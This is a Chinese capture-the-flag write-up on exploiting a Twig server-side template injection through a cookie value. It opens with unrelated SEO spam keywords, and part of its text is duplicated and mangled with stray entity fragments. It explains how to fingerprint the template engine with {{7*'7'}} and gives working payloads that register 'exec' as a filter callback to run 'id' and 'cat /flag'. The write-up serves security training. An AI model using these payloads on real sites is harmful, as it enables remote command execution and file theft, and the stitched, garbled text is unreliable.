网站用户体验度,苏州建设交通官方网站,网页设计模板图片并排显示,wordpress中文版好还是英文版好打开题目 有flag页面#xff0c;有Hint页面
这里题目有提示#xff0c;突破口是在cookie上面
经过测试发现有ssti注入#xff1a; 抓包 判断模板注入类型的办法 输入
{{7*‘7’}}
回显49 输入{{7*‘7’}}#xff0c;返回49表示是 Twig 模块
输入{{7*‘7’}}#xff0…打开题目 有flag页面有Hint页面
这里题目有提示突破口是在cookie上面
经过测试发现有ssti注入 抓包 判断模板注入类型的办法 输入
{{7*‘7’}}
回显49 输入{{7*‘7’}}返回49表示是 Twig 模块
输入{{7*‘7’}}返回7777777表示是 Jinja2 模块
所以判断是Twig
这里在cookie处进行判断
user{{7*‘7’}},查看返回值 这个模板注入是Twig注入
这里注意要在PHPSESSID后user前加上;分隔开
由于是Twig注入所以是有固定的payload {{_self.env.registerUndefinedFilterCallback(exec)}}{{_self.env.getFilter(id)}}//查看id {{_self.env.registerUndefinedFilterCallback(exec)}}{{_self.env.getFilter(cat /flag)}}//查看flag 在cookie输入 构造获取flag的payload {{_self.env.registerUndefinedFilterCallback(exec)}}{{_self.env.getFilter(cat /flag)}}//查看flag 得到flag
